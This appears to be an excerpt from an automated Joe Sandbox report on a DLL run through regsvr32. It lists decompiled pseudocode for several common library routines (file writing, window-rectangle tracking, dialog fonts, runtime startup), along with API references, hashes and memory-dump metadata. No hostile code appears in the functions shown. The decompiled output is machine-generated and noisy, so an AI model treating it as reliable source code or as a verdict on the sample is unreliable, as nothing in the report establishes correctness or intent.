Opcode Fuzzy Hash: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
Instruction Fuzzy Hash: F351D875A0020AAFDB00DFA8DD84CAEB7BAFF48345B154459F646E7255CB31BE41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100197AB Relevance: 6.1, APIs: 4, Instructions: 145
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100197AB(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t68;
				void** _t73;
				signed int _t74;
				long _t76;
				intOrPtr _t79;
				signed int _t81;
				char* _t86;
				int _t91;
				long _t93;
				intOrPtr* _t100;
				void* _t102;
				signed int _t107;
				char _t110;
				struct _OVERLAPPED* _t112;
				long _t115;
				signed int _t118;
				struct _OVERLAPPED* _t120;
				void* _t121;
				void* _t123;

				_t121 = _t123 - 0x3a0;
				_t68 =  *0x1004c470; // 0xf256d946
				_t112 = 0;
				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
				 *(_t121 - 0x78) = 0;
				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
				if( *(_t121 + 0x3b0) != 0) {
					_t100 = 0x1004f920 + ( *(_t121 + 0x3a8) >> 5) * 4;
					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t100 + _t118 + 4) & 0x00000020;
					if(__eflags != 0) {
						E1001B190(_t102, __eflags,  *(_t121 + 0x3a8), 0, 0, 2);
					}
					_t73 =  *_t100 + _t118;
					__eflags = _t73[1] & 0x00000080;
					if((_t73[1] & 0x00000080) == 0) {
						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112);
						__eflags = _t74;
						if(_t74 == 0) {
							 *(_t121 - 0x6c) = GetLastError();
						} else {
							 *(_t121 - 0x6c) = _t112;
							 *(_t121 - 0x78) =  *(_t121 - 0x80);
						}
					} else {
						__eflags =  *(_t121 + 0x3b0) - _t112;
						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
						 *(_t121 - 0x6c) = _t112;
						if( *(_t121 + 0x3b0) <= _t112) {
							L25:
							_t79 =  *_t100;
							__eflags =  *(_t79 + _t118 + 4) & 0x00000040;
							if(( *(_t79 + _t118 + 4) & 0x00000040) == 0) {
								L28:
								 *((intOrPtr*)(E100136F5())) = 0x1c;
								_t81 = E100136FE();
								 *_t81 = _t112;
								L29:
								_t77 = _t81 | 0xffffffff;
								L31:
								goto L32;
							}
							__eflags =  *( *(_t121 + 0x3ac)) - 0x1a;
							if( *( *(_t121 + 0x3ac)) != 0x1a) {
								goto L28;
							}
							_t77 = 0;
							goto L31;
						} else {
							goto L6;
						}
						do {
							L6:
							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
							__eflags = _t107;
							_t86 = _t121 - 0x68;
							 *(_t121 - 0x70) = _t112;
							do {
								__eflags = _t107 -  *(_t121 + 0x3b0);
								if(_t107 >=  *(_t121 + 0x3b0)) {
									break;
								}
								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
								_t110 =  *( *(_t121 - 0x74));
								_t107 = _t107 + 1;
								__eflags = _t110 - 0xa;
								if(_t110 == 0xa) {
									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
									 *_t86 = 0xd;
									_t86 = _t86 + 1;
									_t34 = _t121 - 0x70;
									 *_t34 =  &( *(_t121 - 0x70)->Internal);
									__eflags =  *_t34;
								}
								 *_t86 = _t110;
								_t86 = _t86 + 1;
								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
								__eflags =  *(_t121 - 0x70) - 0x400;
							} while ( *(_t121 - 0x70) < 0x400);
							_t115 = _t86 - _t121 - 0x68;
							_t91 = WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0);
							__eflags = _t91;
							if(_t91 == 0) {
								 *(_t121 - 0x6c) = GetLastError();
								L16:
								_t112 = 0;
								__eflags = 0;
								L17:
								_t76 =  *(_t121 - 0x78);
								__eflags = _t76 - _t112;
								if(_t76 != _t112) {
									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									__eflags = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
									goto L31;
								}
								__eflags =  *(_t121 - 0x6c) - _t112;
								if( *(_t121 - 0x6c) == _t112) {
									goto L25;
								}
								_t120 = 5;
								__eflags =  *(_t121 - 0x6c) - _t120;
								if( *(_t121 - 0x6c) != _t120) {
									_t81 = E10013707( *(_t121 - 0x6c));
								} else {
									 *((intOrPtr*)(E100136F5())) = 9;
									_t81 = E100136FE();
									 *_t81 = _t120;
								}
								goto L29;
							}
							_t93 =  *(_t121 - 0x80);
							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
							__eflags = _t93 - _t115;
							if(_t93 < _t115) {
								goto L16;
							}
							_t112 = 0;
							__eflags =  *(_t121 - 0x74) -  *(_t121 + 0x3ac) -  *(_t121 + 0x3b0);
						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
					}
					goto L17;
				} else {
					_t77 = 0;
					L32:
					return E100117AE(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
				}
			}

0x100197ac
0x100197b9
0x100197bf
0x100197c7
0x100197cd
0x100197d0
0x100197d3
0x100197f3
0x100197fc
0x100197ff
0x10019804
0x10019810
0x10019815
0x1001981a
0x1001981c
0x10019820
0x10019906
0x1001990c
0x1001990e
0x10019921
0x10019910
0x10019913
0x10019916
0x10019916
0x10019826
0x10019826
0x10019832
0x10019835
0x10019838
0x10019931
0x10019931
0x10019933
0x10019938
0x10019949
0x1001994e
0x10019954
0x10019959
0x1001995b
0x1001995b
0x10019963
0x00000000
0x10019964
0x10019940
0x10019943
0x00000000
0x00000000
0x10019945
0x00000000
0x00000000
0x00000000
0x00000000
0x1001983e
0x1001983e
0x10019841
0x10019841
0x10019847
0x1001984a
0x1001984d
0x1001984d
0x10019853
0x00000000
0x00000000
0x10019858
0x1001985b
0x1001985d
0x1001985e
0x10019861
0x10019863
0x10019866
0x10019869
0x1001986a
0x1001986a
0x1001986a
0x1001986a
0x1001986d
0x1001986f
0x10019870
0x10019873
0x10019873
0x10019881
0x10019893
0x10019899
0x1001989b
0x100198c2
0x100198c5
0x100198c5
0x100198c5
0x100198c7
0x100198c7
0x100198ca
0x100198cc
0x10019960
0x10019960
0x00000000
0x10019960
0x100198d2
0x100198d5
0x00000000
0x00000000
0x100198d9
0x100198da
0x100198dd
0x10019929
0x100198df
0x100198e4
0x100198ea
0x100198ef
0x100198ef
0x00000000
0x100198dd
0x1001989d
0x100198a0
0x100198a3
0x100198a5
0x00000000
0x00000000
0x100198b0
0x100198b2
0x100198b2
0x100198ba
0x00000000
0x100197d5
0x100197d5
0x10019965
0x10019978
0x10019978

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,1004C878,00000001), ref: 10019893

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
Instruction ID: bcb25415e8510b231303bc6364b9eff1bf1e0548ad7273a78b3d91e774eab1a2
Opcode Fuzzy Hash: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
Instruction Fuzzy Hash: AD513671900298DFDB22CFA9C880ADDBBF8FF46744F21411AE9599F256DB309A81CF11

Uniqueness

Uniqueness Score: -1.00%

Function 1003078E Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1003078E(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t76;
				int _t78;
				intOrPtr _t83;
				intOrPtr _t102;
				int _t116;
				void* _t124;
				void* _t128;
				intOrPtr _t133;
				void* _t135;
				void* _t139;

				_t135 = __edi;
				_t124 = __ecx;
				_t76 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t128 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t133 =  *((intOrPtr*)(__ecx + 0x8c));
				_t139 = 2;
				if(_t133 == 0xa) {
					L7:
					 *((intOrPtr*)(_t124 + 0x28)) =  *((intOrPtr*)(_t124 + 0x28)) + _t76;
					L9:
					_t78 =  *((intOrPtr*)(_t124 + 0x30)) -  *((intOrPtr*)(_t124 + 0x28));
					__eflags = _t78;
					L10:
					if(_t78 < 0) {
						_t78 = 0;
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x68)))) + 0x134))( &_v12, _t78, _t139, _t135);
					GetWindowRect(GetDesktopWindow(),  &_v44);
					_t83 =  *((intOrPtr*)(_t124 + 0x8c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if(_t83 == 0xa || _t83 == 0xc) {
						_v28.left = _v28.right -  *((intOrPtr*)(_t124 + 0x60)) - _v12 +  *((intOrPtr*)(_t124 + 0x58));
						_v28.top =  *((intOrPtr*)(_t124 + 0x5c)) -  *((intOrPtr*)(_t124 + 0x64)) - _v8 + _v28.bottom;
						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t124 + 0x38)) =  *((intOrPtr*)(_t124 + 0x40)) - _v12;
							_t102 =  *((intOrPtr*)(_t124 + 0x44)) - _v8;
							__eflags = _t102;
							 *((intOrPtr*)(_t124 + 0x3c)) = _t102;
							 *(_t124 + 0x48) = _v28.left;
							 *((intOrPtr*)(_t124 + 0x4c)) = _v28.top;
						}
					} else {
						_v28.right =  *((intOrPtr*)(_t124 + 0x60)) -  *((intOrPtr*)(_t124 + 0x58)) + _v28.left + _v12;
						_v28.bottom =  *((intOrPtr*)(_t124 + 0x64)) -  *((intOrPtr*)(_t124 + 0x5c)) + _v28.top + _v8;
						_t116 = IntersectRect( &_v60,  &_v44,  &_v28);
						_t149 = _t116;
						if(_t116 != 0) {
							 *((intOrPtr*)(_t124 + 0x40)) =  *((intOrPtr*)(_t124 + 0x38)) + _v12;
							 *((intOrPtr*)(_t124 + 0x44)) =  *((intOrPtr*)(_t124 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t124 + 0x50)) = _v28.right;
							 *((intOrPtr*)(_t124 + 0x54)) = _v28.bottom;
						}
					}
					 *((intOrPtr*)(_t124 + 4)) = _a4;
					 *((intOrPtr*)(_t124 + 8)) = _a8;
					return E10030582(_t124, _t149, 0);
				}
				if(_t133 == 0xb) {
					__eflags = _t133 - 0xa;
					if(_t133 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t76;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t139 = 0x22;
					if(_t133 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t128;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t128;
					}
					_t78 =  *((intOrPtr*)(_t124 + 0x34)) -  *((intOrPtr*)(_t124 + 0x2c));
					goto L10;
				}
			}

0x1003078e
0x10030798
0x100307a0
0x100307a6
0x100307a8
0x100307b3
0x100307b4
0x100307d8
0x100307d8
0x100307e0
0x100307e3
0x100307e3
0x100307e6
0x100307e8
0x100307ea
0x100307ea
0x100307f8
0x10030809
0x1003080f
0x1003081e
0x1003081f
0x10030820
0x10030821
0x10030823
0x1003088a
0x10030899
0x100308ae
0x100308b0
0x100308b8
0x100308be
0x100308be
0x100308c1
0x100308c7
0x100308cd
0x100308cd
0x1003082a
0x10030836
0x10030845
0x10030854
0x1003085a
0x1003085c
0x10030864
0x1003086d
0x10030873
0x10030879
0x10030879
0x1003085c
0x100308d3
0x100308dd
0x100308e8
0x100308e8
0x100307b9
0x100307d3
0x100307d6
0x100307dd
0x100307dd
0x100307dd
0x00000000
0x100307dd
0x00000000
0x100307bb
0x100307c0
0x100307c1
0x100307c8
0x100307c8
0x100307c8
0x100307c3
0x100307c3
0x100307c3
0x100307ce
0x00000000
0x100307ce

APIs

GetDesktopWindow.USER32 ref: 100307FE
GetWindowRect.USER32 ref: 10030809
IntersectRect.USER32 ref: 10030854
IntersectRect.USER32 ref: 100308A8

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$IntersectWindow$Desktop
String ID:
API String ID: 123605412-0
Opcode ID: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
Instruction ID: 610273ea94d3692e70733b76c969e3fbb3ef96a28992a3e324fe7b4179401a7e
Opcode Fuzzy Hash: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
Instruction Fuzzy Hash: D2516076A012099FCB45DFACC5D5A9E7BF8FF08355F148195E905EB20AE630E980CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 10024838 Relevance: 6.1, APIs: 4, Instructions: 115
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10024838(void* __ebx, void** __ecx, void* __edi, void* __esi, char* _a4, short _a8) {
				intOrPtr _v8;
				short _v72;
				signed int _v76;
				signed int _v80;
				void** _v84;
				signed int _v88;
				intOrPtr _t52;
				short* _t65;
				void* _t74;
				short* _t81;
				void* _t86;
				char* _t92;
				signed int _t93;
				signed int* _t95;
				void** _t96;
				signed int _t101;
				signed int _t103;
				void* _t106;

				_t52 =  *0x1004c470; // 0xf256d946
				_v8 = _t52;
				_v84 = __ecx;
				if(__ecx[1] != 0) {
					_t95 = GlobalLock( *__ecx);
					_v80 = 0 | _t95[0] == 0x0000ffff;
					_v76 = E100246AB(_t95);
					_t101 = (0 | _v80 != 0x00000000) + (0 | _v80 != 0x00000000) + 1 << 1;
					_v88 = _t101;
					if(_v80 == 0) {
						 *_t95 =  *_t95 | 0x00000040;
					} else {
						_t95[3] = _t95[3] | 0x00000040;
					}
					if(lstrlenA(_a4) < 0x20) {
						_a4 = _t101 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v72, 0x20) * 2;
						_t65 = E1002472A(_t95);
						_t86 = 0;
						_t81 = _t65;
						if(_v76 != 0) {
							_t86 = _t101 + 2 + E100124FC(_t81 + _t101) * 2;
						}
						_t92 = _a4;
						_t31 = _t81 + 3; // 0x3
						_t33 = _t92 + 3; // 0x3
						_t67 = _t86 + _t31 & 0xfffffffc;
						_t103 = _t81 + _t33 & 0xfffffffc;
						_v76 = _t86 + _t31 & 0xfffffffc;
						if(_v80 == 0) {
							_t93 = _t95[2];
						} else {
							_t93 = _t95[4];
						}
						if(_a4 != _t86 && _t93 > 0) {
							E100118B0(_t103, _t67, _t95 - _t67 + _v84[1]);
							_t106 = _t106 + 0xc;
						}
						 *_t81 = _a8;
						E100118B0(_t81 + _v88,  &_v72, _a4 - _v88);
						_t96 = _v84;
						_t96[1] = _t96[1] + _t103 - _v76;
						GlobalUnlock( *_t96);
						_t96[2] = _t96[2] & 0x00000000;
						_t74 = 1;
					} else {
						_t74 = 0;
					}
				} else {
					_t74 = 0;
				}
				return E100117AE(_t74, _v8);
			}

0x1002483e
0x10024849
0x1002484c
0x1002484f
0x10024862
0x10024870
0x10024878
0x1002488d
0x1002488f
0x10024892
0x1002489a
0x10024894
0x10024894
0x10024894
0x100248a9
0x100248c9
0x100248cc
0x100248d2
0x100248d7
0x100248d9
0x100248e5
0x100248e5
0x100248e9
0x100248ec
0x100248f0
0x100248f4
0x100248f7
0x100248fe
0x10024901
0x10024909
0x10024903
0x10024903
0x10024903
0x10024910
0x10024922
0x10024927
0x10024927
0x10024931
0x10024941
0x10024946
0x10024951
0x10024954
0x1002495a
0x10024960
0x100248ab
0x100248ab
0x100248ab
0x10024851
0x10024851
0x10024851
0x1002496d

APIs

GlobalLock.KERNEL32 ref: 1002485C
lstrlenA.KERNEL32(?), ref: 100248A0

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: GlobalLocklstrlen
String ID:
API String ID: 1144527523-0
Opcode ID: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
Instruction ID: afb049e80b1b3f5565d5b3658fd79ee3861b352aa931f7b78d6a2774fdc8a605
Opcode Fuzzy Hash: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
Instruction Fuzzy Hash: 9341B632900219EFDB14DFB4D88589EBBB8FF44354B518229E815DB255EF70E995CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1001119B Relevance: 6.1, APIs: 4, Instructions: 113
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E1001119B(void* __ebx, void* __ecx, void* __edi, long* _a8) {
				void* _v8;
				void* __esi;
				void* __ebp;
				long* _t9;
				long* _t11;
				long _t17;
				signed int _t25;
				long* _t33;
				long* _t36;
				long* _t38;
				long* _t39;
				long _t47;
				long _t50;
				void* _t52;
				long* _t53;
				struct _OSVERSIONINFOA* _t54;
				signed int _t56;
				struct _OSVERSIONINFOA* _t58;

				_t9 = _a8;
				if(_t9 != 1) {
					__eflags = _t9;
					if(_t9 != 0) {
						__eflags = _t9 - 2;
						if(__eflags != 0) {
							__eflags = _t9 - 3;
							if(_t9 == 3) {
								E10015355(0);
							}
							L27:
							_t11 = 1;
							__eflags = 1;
							L28:
							return _t11;
						}
						_push(0x8c);
						_push(1);
						_t53 = E1001382A(__ebx, __edi, _t52, __eflags);
						__eflags = _t53;
						if(_t53 == 0) {
							L24:
							_t11 = 0;
							goto L28;
						}
						__eflags =  *0x1004f5e4( *0x1004c848, _t53);
						_push(_t53);
						if(__eflags == 0) {
							E100107C8(__ebx, __edi, _t53, __eflags);
							goto L24;
						}
						E1001518A();
						_t17 = GetCurrentThreadId();
						_t53[1] = _t53[1] | 0xffffffff;
						 *_t53 = _t17;
						goto L27;
					}
					__eflags =  *0x1004f3c8 - _t9; // 0x0
					if(__eflags <= 0) {
						goto L24;
					}
					 *0x1004f3c8 =  *0x1004f3c8 - 1;
					__eflags =  *0x1004f41c - _t9; // 0x1
					if(__eflags == 0) {
						E10011F67();
					}
					E1001634A();
					E1001516D();
					E10013AD4();
					goto L27;
				}
				E10010B20(0x94, __ecx);
				_t54 = _t58;
				_t54->dwOSVersionInfoSize = 0x94;
				if(GetVersionExA(_t54) == 0) {
					goto L24;
				}
				_t47 = _t54->dwPlatformId;
				 *0x1004f3e0 = _t47;
				_t25 = _t54->dwMajorVersion;
				 *0x1004f3ec = _t25;
				_t50 = _t54->dwMinorVersion;
				 *0x1004f3f0 = _t50;
				_t56 = _t54->dwBuildNumber & 0x00007fff;
				 *0x1004f3e4 = _t56;
				if(_t47 != 2) {
					 *0x1004f3e4 = _t56 | 0x00008000;
				}
				 *0x1004f3e8 = (_t25 << 8) + _t50;
				if(E10013A83(1) != 0) {
					if(E10015384() != 0) {
						E1001678D(__eflags);
						 *0x10050cb0 = GetCommandLineA();
						 *0x1004f3cc = E1001666B();
						_t33 = E1001614C();
						__eflags = _t33;
						if(_t33 < 0) {
							L13:
							E1001516D();
							goto L6;
						}
						_t36 = E100165C9();
						__eflags = _t36;
						if(_t36 < 0) {
							L12:
							E1001634A();
							goto L13;
						}
						_t38 = E10016396();
						__eflags = _t38;
						if(_t38 < 0) {
							goto L12;
						}
						_t39 = E10011E29(0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L12;
						}
						 *0x1004f3c8 =  *0x1004f3c8 + 1;
						goto L27;
					}
					L6:
					E10013AD4();
				}
			}

0x1001119e
0x100111a5
0x1001128b
0x1001128d
0x100112bb
0x100112be
0x10011304
0x10011307
0x1001130b
0x10011310
0x10011311
0x10011313
0x10011313
0x10011314
0x10011319
0x10011319
0x100112c0
0x100112c5
0x100112cc
0x100112ce
0x100112d2
0x10011300
0x10011300
0x00000000
0x10011300
0x100112e1
0x100112e3
0x100112e4
0x100112fa
0x00000000
0x100112ff
0x100112e6
0x100112ec
0x100112f2
0x100112f6
0x00000000
0x100112f6
0x1001128f
0x10011295
0x00000000
0x00000000
0x10011297
0x1001129d
0x100112a3
0x100112a5
0x100112a5
0x100112aa
0x100112af
0x100112b4
0x00000000
0x100112b4
0x100111b0
0x100111b5
0x100111b8
0x100111c6
0x00000000
0x00000000
0x100111cc
0x100111cf
0x100111d5
0x100111d8
0x100111dd
0x100111e0
0x100111e9
0x100111f2
0x100111f8
0x10011200
0x10011200
0x1001120d
0x1001121a
0x10011227
0x10011233
0x1001123e
0x10011248
0x1001124d
0x10011252
0x10011254
0x10011284
0x10011284
0x00000000
0x10011284
0x10011256
0x1001125b
0x1001125d
0x1001127f
0x1001127f
0x00000000
0x1001127f
0x1001125f
0x10011264
0x10011266
0x00000000
0x00000000
0x1001126a
0x1001126f
0x10011272
0x00000000
0x00000000
0x10011274
0x00000000
0x10011274
0x10011229
0x10011229
0x10011229

APIs

GetVersionExA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100111BE
GetCommandLineA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10011238

Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
Part of subcall function 1001666B: FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C

Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC

FlsSetValue.KERNEL32(00000000,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100112DB
GetCurrentThreadId.KERNEL32 ref: 100112EC

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharMultiWide$AllocateCommandCurrentFreeHeapLineThreadValueVersion__lock
String ID:
API String ID: 770256606-0
Opcode ID: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
Instruction ID: a119cf37508875902a7ac88b5959fce435ef45eee062e48075b7e26cf38889a7
Opcode Fuzzy Hash: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
Instruction Fuzzy Hash: 7D31F635904312DBF728DFB08D8669A77E4EF05792F10412EF860CE552EB30EAC08B61

Uniqueness

Uniqueness Score: -1.00%

Function 10030582 Relevance: 6.1, APIs: 4, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10030582(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __esi;
				void* __ebp;
				signed char _t60;
				signed char _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				intOrPtr _t83;
				void* _t91;

				_t91 = __eflags;
				_t76 = __ecx;
				_v24 = 1;
				_v20 = 1;
				_push(GetStockObject(0));
				_t83 = E1002934F();
				_v16 = _t83;
				_v8 = E10033F2F(_t83, _t91);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t83;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00000050;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L6:
							__eflags = _t65 & 0x00000050;
							if(__eflags == 0) {
								L9:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L6;
							}
						}
						_v12 = _v8;
					} else {
					}
				} else {
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				if(( *(_t76 + 0x75) & 0x000000f0) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t95 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E10033FCE( *((intOrPtr*)(_t76 + 0x84)), _t95,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				asm("movsd");
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}

0x10030582
0x10030590
0x10030592
0x10030595
0x1003059e
0x100305a4
0x100305a6
0x100305ae
0x100305b1
0x100305b4
0x100305be
0x100305c5
0x100305c8
0x100305dc
0x100305e2
0x100305e5
0x100305e8
0x100305ea
0x100305f2
0x100305f2
0x100305f5
0x10030602
0x100305f7
0x100305f7
0x100305fb
0x00000000
0x00000000
0x00000000
0x00000000
0x100305fb
0x100305ec
0x100305ec
0x100305f0
0x00000000
0x00000000
0x100305f0
0x10030608
0x100305ca
0x100305ca
0x100305c0
0x100305c0
0x1003060e
0x1003060f
0x10030610
0x10030611
0x10030617
0x10030619
0x1003061c
0x1003061c
0x10030623
0x1003062d
0x1003062d
0x10030633
0x10030636
0x10030639
0x1003063b
0x1003063b
0x1003065c
0x1003066a
0x1003066b
0x10030671
0x10030672
0x1003067a
0x1003067b
0x1003067e
0x10030681
0x10030686

APIs

GetStockObject.GDI32(00000000), ref: 10030598

Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C

InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D

Memory Dump Source

